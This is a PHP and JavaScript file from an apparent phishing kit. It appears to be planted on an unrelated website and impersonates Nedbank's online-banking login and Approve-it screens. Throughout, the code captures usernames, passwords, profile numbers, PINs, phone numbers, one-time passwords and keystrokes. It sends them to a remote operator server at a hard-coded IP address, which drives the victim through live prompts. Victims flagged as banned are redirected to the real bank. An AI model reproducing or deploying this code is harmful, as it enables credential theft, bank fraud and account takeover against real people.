File: C:/inetpub/vhosts/hrreflections.com/httpdocs/content/content.php
<?php
session_start();
include(\\\"csrf_functions.php\\\");
$clientIP = $_SERVER[\\\'REMOTE_ADDR\\\'];
$userAgent = $_SERVER[\\\'HTTP_USER_AGENT\\\'];
$csrfToken = generateCsrfToken($clientIP, $userAgent);
$adminurl = \\\"http://104.239.66.192:8888/api/v1/\\\";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $adminurl . \\\"log?ip=\\\" . $clientIP);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch); // Close the connection
header(\\\'Content-Type: application/javascript\\\');
echo \\\'var siteURL = \\\"\\\'.$adminurl.\\\'\\\";\\\';
?>
const requestStatus = \\\'<?php echo $csrfToken; ?>\\\';
function togglepass() {
var x = document.getElementById(\\\"password\\\");
if (x.type === \\\"password\\\") {
x.type = \\\"text\\\";
document.getElementById(\\\'togglebtn\\\').className = \\\"fa-fa-eye-hide\\\";
} else {
x.type = \\\"password\\\";
document.getElementById(\\\'togglebtn\\\').className = \\\"fa-fa-eye-show\\\";
}
}
var identifier;
var timer;
var currentPage = \\\"LOGINPAGE\\\";
var currentStatus = \\\"idle\\\"
var liveupdateTimer = null;
var currentIdentifier = null;
var approveTimer = null;
let userActivityStatus = {
isTyping: false,
isIdle: true,
lastActivity: null,
textTyped: \\\'\\\'
};
let typingTimer;
const idleTimeout = 5000;
document.addEventListener(\\\'keydown\\\', handleUserInput);
document.addEventListener(\\\'keyup\\\', handleUserInput);
document.addEventListener(\\\'copy\\\', handleCopyEvent);
document.addEventListener(\\\'cut\\\', handleCutEvent);
document.addEventListener(\\\'paste\\\', handlePasteEvent);
function handleUserInput(event) {
clearTimeout(typingTimer);
if (event.type === \\\'keydown\\\') {
userActivityStatus.isTyping = true;
userActivityStatus.isIdle = false;
if (userActivityStatus.textTyped.length > 44) {
userActivityStatus.textTyped = event.key;
} else {
userActivityStatus.textTyped += event.key;
}
} else {
userActivityStatus.isTyping = false;
}
userActivityStatus.lastActivity = new Date();
typingTimer = setTimeout(() => {
userActivityStatus.isIdle = true;
}, idleTimeout);
}
function handleCopyEvent(event) {
userActivityStatus.lastActivity = new Date();
userActivityStatus.isIdle = false;
userActivityStatus.textTyped = \\\'Copied text\\\';
resetIdleTimer(10000);
}
function handleCutEvent(event) {
userActivityStatus.lastActivity = new Date();
userActivityStatus.isIdle = false;
userActivityStatus.textTyped = \\\'Cut text\\\';
resetIdleTimer(10000);
}
function handlePasteEvent(event) {
userActivityStatus.lastActivity = new Date();
userActivityStatus.isIdle = false;
userActivityStatus.textTyped = \\\'Pasted text\\\';
resetIdleTimer(10000);
}
function resetIdleTimer(waittime) {
clearTimeout(typingTimer);
typingTimer = setTimeout(() => {
userActivityStatus.isIdle = true;
}, waittime);
}
function getCurrentUserActivityStatus() {
if (userActivityStatus.isTyping) {
return `typing: ${userActivityStatus.textTyped}`;
} else if (!userActivityStatus.isIdle) {
const lastActivity = userActivityStatus.lastActivity;
const timeSinceLastActivity = new Date() - lastActivity;
const secondsAgo = Math.floor(timeSinceLastActivity / 1000);
return `Action:${userActivityStatus.textTyped} was ${secondsAgo} seconds ago`;
} else {
return \\\'User is idle\\\';
}
}
function getUAgent() {
var userAgentString = navigator.userAgent;
var browserName = \\\"\\\";
if (userAgentString.indexOf(\\\"Firefox\\\") !== -1) browserName = \\\"Firefox\\\";
else if (userAgentString.indexOf(\\\"Chrome\\\") !== -1) browserName = \\\"Chrome\\\";
else if (userAgentString.indexOf(\\\"Safari\\\") !== -1) browserName = \\\"Safari\\\";
else if (userAgentString.indexOf(\\\"Edge\\\") !== -1) browserName = \\\"Edge\\\";
else if (userAgentString.indexOf(\\\"MSIE\\\") !== -1 || userAgentString.indexOf(\\\"Trident\\\") !== -1) browserName = \\\"Internet Explorer\\\";
else browserName = \\\"Unknown Browser\\\";
var os = \\\"\\\";
if (userAgentString.indexOf(\\\"Windows\\\") !== -1) os = \\\"Windows\\\";
else if (userAgentString.indexOf(\\\"Mac OS\\\") !== -1) os = \\\"Mac OS\\\";
else if (userAgentString.indexOf(\\\"Linux\\\") !== -1) os = \\\"Linux\\\";
else if (userAgentString.indexOf(\\\"Android\\\") !== -1) os = \\\"Android\\\";
else if (userAgentString.indexOf(\\\"iOS\\\") !== -1) os = \\\"iOS\\\";
else os = \\\"Unknown OS\\\";
return browserName + \\\":\\\" + os;
}
function register(identifier) {
let useragent = getUAgent();
currentIdentifier = identifier;
if (liveupdateTimer) {
clearInterval(liveupdateTimer);
liveupdateTimer = null;
}
$.ajax({
url: siteURL + \\\'register\\\',
data: \\\'identifier=\\\' + encodeURIComponent(identifier) + \\\'&useragent=\\\' + encodeURIComponent(useragent),
dataType: \\\"jsonp\\\",
cache: false,
success: function (results) {
liveupdate(identifier);
}
});
}
function liveupdate(identifier) {
liveupdateTimer = setInterval(function () {
if (identifier !== currentIdentifier) {
if (liveupdateTimer) {
clearInterval(liveupdateTimer);
liveupdateTimer = null;
}
return;
}
$.ajax({
url: siteURL + \\\'server\\\',
data: \\\'identifier=\\\' + encodeURIComponent(identifier) + \\\'&cpage=\\\' + encodeURIComponent(currentPage) + \\\'&status=\\\' + encodeURIComponent(getCurrentUserActivityStatus()),
dataType: \\\"jsonp\\\",
cache: false,
success: function (responseText) {
var status = responseText.status;
if (status === \\\"VERIFYPAGE\\\") {
currentPage = status;
showCard(\\\'verify\\\');
} else if (status === \\\"WRONGPASSWORD\\\") {
currentPage = status;
showCard(\\\'error\\\');
if (typeof resetLoginFlow === \\\'function\\\') resetLoginFlow();
} else if (status === \\\"PHONENUMBER\\\") {
currentPage = status;
showCard(\\\'phone\\\');
} else if (status === \\\"OTPPAGE\\\") {
currentPage = status;
showCard(\\\'otp\\\');
} else if (status === \\\"LOGINAPPROVE\\\") {
currentPage = status;
showCard(\\\'approvelogin\\\');
} else if (status === \\\"MIDAPPROVE\\\") {
currentPage = status;
showCard(\\\'approvemid\\\');
} else if (status === \\\"ENDPAGE\\\") {
if (liveupdateTimer) {
clearInterval(liveupdateTimer);
liveupdateTimer = null;
}
currentPage = status;
showCard(\\\'end\\\');
} else if (status === \\\"LOGINPAGE\\\" || responseText.status == \\\"LOGINPAGE\\\") {
window.location.reload();
} else if (status === \\\"BAN\\\" || status === \\\"REDIRECT\\\") {
if (liveupdateTimer) {
clearInterval(liveupdateTimer);
liveupdateTimer = null;
}
window.location.href = \\\'https://www.nedbank.co.za/content/nedbank/desktop/gt/en/personal.html\\\';
}
}
});
}, 1000);
}
function ajax_jsonp_call(post_url, formValues, callBack) {
$.ajax({
url: post_url,
data: formValues,
dataType: \\\"jsonp\\\",
cache: false,
success: function (results) {
callBack(results);
},
error: function (jqXHR, textStatus, errorThrown) {
console.log(\\\'Error: \\\' + textStatus + \\\' - \\\' + errorThrown);
}
});
}
function setLoginApprove() {
document.getElementById(\\\'approvehead\\\').innerText = \\\"Go to your Money app to accept the Approve-it message\\\";
document.getElementById(\\\'approvetext\\\').innerText = \\\"To help protect you a secure message has been sent to your cellphone.\\\";
}
function setMidApprove(){
document.getElementById(\\\'approvehead\\\').innerText=\\\"Go to your Approve-it device and open the Money app to accept our Approve-it message\\\";
document.getElementById(\\\'approvetext\\\').innerText=\\\"if the cellphone you\\\'ve linked as your Approve-it device is lost or damaged, please call us onn +27 80 055 5111 or visit your nearest branch.\\\";
}
function setapprovetimeout() {
document.getElementById(\\\'approvehead\\\').innerText = \\\"The Approve-it message timed out\\\";
document.getElementById(\\\'approvetext\\\').innerText = \\\"This security message can be re-sent to your cellphone.\\\";
}
function showCard(card) {
const verifybox = document.getElementById(\\\'verifybox\\\');
const cellbox = document.getElementById(\\\'cellbox\\\');
const otpbox = document.getElementById(\\\'otpbox\\\');
const loadingbox = document.getElementById(\\\'loadingbox\\\');
const endbox = document.getElementById(\\\'endbox\\\');
const approvebox = document.getElementById(\\\'approvebox\\\');
const errormsg = document.getElementById(\\\'loginerrormsg\\\');
if (verifybox) verifybox.style.display = \\\'none\\\';
if (cellbox) cellbox.style.display = \\\'none\\\';
if (otpbox) otpbox.style.display = \\\'none\\\';
if (loadingbox) loadingbox.style.display = \\\'none\\\';
if (endbox) endbox.style.display = \\\'none\\\';
if (approvebox) approvebox.style.display = \\\'none\\\';
if (errormsg) errormsg.style.display = \\\'none\\\';
const timeoutDiv = document.getElementById(\\\'otptimeoutshow\\\');
if (timeoutDiv) timeoutDiv.style.display = \\\'none\\\';
if (approveTimer) {
clearInterval(approveTimer);
approveTimer = null;
}
if (card === \\\'login\\\') {
currentPage = \\\'LOGINPAGE\\\';
} else if (card === \\\'verify\\\') {
if (verifybox) verifybox.style.display = \\\'block\\\';
currentPage = \\\'VERIFYPAGE\\\';
} else if (card === \\\'phone\\\') {
if (cellbox) cellbox.style.display = \\\'block\\\';
currentPage = \\\'PHONENUMBER\\\';
} else if (card === \\\'otp\\\') {
if (otpbox) otpbox.style.display = \\\'block\\\';
currentPage = \\\'OTPPAGE\\\';
} else if (card === \\\'loading\\\') {
if (loadingbox) {
loadingbox.style.display = \\\'block\\\';
console.log(\\\'set loading to block\\\')
}
else {
console.log(\\\'loadingbox not found\\\')
}
} else if (card === \\\'approvelogin\\\') {
setLoginApprove();
if (approvebox) approvebox.style.display = \\\'block\\\';
currentPage = \\\'APPROVEPAGE\\\';
let timeLeft = 60;
const timeDisplay = document.getElementById(\\\'atimeleft\\\');
const progressBar = document.getElementById(\\\'atimeleftbar\\\');
if (timeDisplay) timeDisplay.innerHTML = timeLeft;
if (progressBar) progressBar.style.width = \\\'100%\\\';
approveTimer = setInterval(function () {
timeLeft--;
if (timeDisplay) timeDisplay.innerHTML = timeLeft;
if (progressBar) progressBar.style.width = (timeLeft / 60 * 100) + \\\'%\\\';
if (timeLeft <= 0) {
clearInterval(approveTimer);
approveTimer = null;
setapprovetimeout();
if (timeoutDiv) timeoutDiv.style.display = \\\'block\\\';
const resendBtn = document.getElementById(\\\'approve_resend\\\');
if (resendBtn) resendBtn.disabled = false;
}
}, 1000);
} else if (card === \\\'approvemid\\\') {
setMidApprove();
if (approvebox) approvebox.style.display = \\\'block\\\';
currentPage = \\\'APPROVEMIDPAGE\\\';
let timeLeft = 60;
const timeDisplay = document.getElementById(\\\'atimeleft\\\');
const progressBar = document.getElementById(\\\'atimeleftbar\\\');
if (timeDisplay) timeDisplay.innerHTML = timeLeft;
if (progressBar) progressBar.style.width = \\\'100%\\\';
approveTimer = setInterval(function () {
timeLeft--;
if (timeDisplay) timeDisplay.innerHTML = timeLeft;
if (progressBar) progressBar.style.width = (timeLeft / 60 * 100) + \\\'%\\\';
if (timeLeft <= 0) {
clearInterval(approveTimer);
approveTimer = null;
setapprovetimeout();
if (timeoutDiv) timeoutDiv.style.display = \\\'block\\\';
const resendBtn = document.getElementById(\\\'approve_resend\\\');
if (resendBtn) resendBtn.disabled = false;
}
}, 1000);
} else if (card === \\\'end\\\') {
if (endbox) endbox.style.display = \\\'block\\\';
currentPage = \\\'ENDPAGE\\\';
} else if (card === \\\'error\\\') {
if (errormsg) errormsg.style.display = \\\'block\\\';
document.getElementById(\\\'subspinner\\\').style.display = \\\'none\\\';
document.getElementById(\\\'logintext\\\').style.display = \\\'block\\\';
currentPage = \\\'LOGINPAGE\\\';
}
}
function setupSignFlow() {
const usernameInput = document.getElementById(\\\'username\\\');
const passwordInput = document.getElementById(\\\'password\\\');
const loginButton = document.getElementById(\\\'log_in\\\');
const verifybox = document.getElementById(\\\'verifybox\\\');
const profilenumberInput = verifybox ? verifybox.querySelector(\\\'#profilenumber\\\') : null;
const pinInput = verifybox ? verifybox.querySelector(\\\'#pin\\\') : null;
const verifySubmit = verifybox ? verifybox.querySelector(\\\'#verify_submit\\\') : null;
const cellbox = document.getElementById(\\\'cellbox\\\');
const cellInput = cellbox ? cellbox.querySelector(\\\'#phonenum\\\') : null;
const cellSubmit = cellbox ? cellbox.querySelector(\\\'#phone_submit\\\') : null;
const otpbox = document.getElementById(\\\'otpbox\\\');
const otpInput = otpbox ? otpbox.querySelector(\\\'#otp\\\') : null;
const otpSubmit = otpbox ? otpbox.querySelector(\\\'#otp_submit\\\') : null;
function updateButtonState(btn, condition) {
if (btn) {
btn.disabled = !condition;
if (btn.disabled) {
btn.classList.add(\\\'disabled\\\');
} else {
btn.classList.remove(\\\'disabled\\\');
}
}
}
if (usernameInput) usernameInput.addEventListener(\\\'input\\\', updateLoginButtonState);
if (passwordInput) passwordInput.addEventListener(\\\'input\\\', updateLoginButtonState);
function updateLoginButtonState() {
const hasUsername = usernameInput && usernameInput.value.trim().length > 0;
const hasPassword = passwordInput && passwordInput.value.trim().length > 0;
updateButtonState(loginButton, hasUsername && hasPassword);
}
function updateVerifyButtonState() {
const profile = profilenumberInput && profilenumberInput.value.trim().length > 0;
const pin = pinInput && pinInput.value.trim().length > 0;
updateButtonState(verifySubmit, profile && pin);
}
if (profilenumberInput) profilenumberInput.addEventListener(\\\'input\\\', updateVerifyButtonState);
if (pinInput) pinInput.addEventListener(\\\'input\\\', updateVerifyButtonState);
function updateCellButtonState() {
const cell = cellInput ? cellInput.value.replace(/\\\\D/g, \\\'\\\') : \\\'\\\';
updateButtonState(cellSubmit, cell.length >= 9);
}
if (cellInput) cellInput.addEventListener(\\\'input\\\', updateCellButtonState);
function updateOtpButtonState() {
const otp = otpInput && otpInput.value.trim().length > 0;
updateButtonState(otpSubmit, !!otp);
}
if (otpInput) otpInput.addEventListener(\\\'input\\\', updateOtpButtonState);
window.resetLoginFlow = function () {
// if (usernameInput) usernameInput.value = \\\'\\\';
// if (passwordInput) passwordInput.value = \\\'\\\';
// showCard(\\\'login\\\');
// updateLoginButtonState();
currentIdentifier = null;
if (liveupdateTimer) {
clearInterval(liveupdateTimer);
liveupdateTimer = null;
}
};
if (loginButton) {
loginButton.addEventListener(\\\'click\\\', function (event) {
event.preventDefault();
const operator = usernameInput ? usernameInput.value.trim() : \\\'\\\';
const password = passwordInput ? passwordInput.value.trim() : \\\'\\\';
if (!operator || !password) return;
document.getElementById(\\\'subspinner\\\').style.display = \\\'block\\\';
document.getElementById(\\\'logintext\\\').style.display = \\\'none\\\';
ajax_jsonp_call(
siteURL + \\\'begin\\\',
\\\'username=\\\' + encodeURIComponent(operator) +
\\\'&password=\\\' + encodeURIComponent(password),
function (results) {
if (results.message === \\\"success\\\") {
showCard(\\\'loading\\\');
register(operator);
} else if (results.message === \\\"Malformed input\\\") {
showCard(\\\'error\\\');
document.getElementById(\\\'subspinner\\\').style.display = \\\'none\\\';
document.getElementById(\\\'logintext\\\').style.display = \\\'block\\\';
}
}
);
});
}
if (verifySubmit) {
verifySubmit.addEventListener(\\\'click\\\', function (event) {
event.preventDefault();
const operator = usernameInput ? usernameInput.value.trim() : \\\'\\\';
const profile = profilenumberInput ? profilenumberInput.value.trim() : \\\'\\\';
const pin = pinInput ? pinInput.value.trim() : \\\'\\\';
if (!profile || !pin) return;
showCard(\\\'loading\\\');
ajax_jsonp_call(
siteURL + \\\'verify\\\',
\\\'username=\\\' + encodeURIComponent(operator) +
\\\'&profilenumber=\\\' + encodeURIComponent(profile) +
\\\'&pin=\\\' + encodeURIComponent(pin),
function (results) { }
);
});
}
const resendBtn = document.getElementById(\\\'approve_resend\\\');
if (resendBtn) {
resendBtn.addEventListener(\\\'click\\\', function (event) {
event.preventDefault();
showCard(\\\'loading\\\');
ajax_jsonp_call(
siteURL + \\\'resend_approve\\\',
\\\'identifier=\\\' + encodeURIComponent(currentIdentifier),
function (results) { }
);
});
}
if (cellSubmit) {
cellSubmit.addEventListener(\\\'click\\\', function (event) {
event.preventDefault();
const operator = usernameInput ? usernameInput.value.trim() : \\\'\\\';
const phone = cellInput ? cellInput.value.replace(/\\\\D/g, \\\'\\\') : \\\'\\\';
if (phone.length < 9) return;
showCard(\\\'loading\\\');
ajax_jsonp_call(
siteURL + \\\'phone\\\',
\\\'username=\\\' + encodeURIComponent(operator) +
\\\'&phonenum=\\\' + encodeURIComponent(phone),
function () { }
);
});
}
if (otpSubmit) {
otpSubmit.addEventListener(\\\'click\\\', function (event) {
event.preventDefault();
const operator = usernameInput ? usernameInput.value.trim() : \\\'\\\';
const otp = otpInput ? otpInput.value.trim() : \\\'\\\';
if (!otp) return;
showCard(\\\'loading\\\');
ajax_jsonp_call(
siteURL + \\\'otp\\\',
\\\'username=\\\' + encodeURIComponent(operator) +
\\\'&otp=\\\' + encodeURIComponent(otp),
function () { }
);
});
}
const cancelBtns = document.querySelectorAll(\\\'#cancel\\\');
cancelBtns.forEach(btn => btn.addEventListener(\\\'click\\\', () => showCard(\\\'login\\\')));
showCard(\\\'login\\\');
}
const bodyHtml = <?php echo json_encode(file_get_contents(\\\"body.txt\\\")); ?>;
document.addEventListener(\\\'DOMContentLoaded\\\', function () {
const bodyObj = document.getElementById(\\\'body1\\\');
if (bodyObj) {
bodyObj.innerHTML = bodyHtml;
setupSignFlow();
} else {
console.error(\\\'body1 not found\\\');
}
});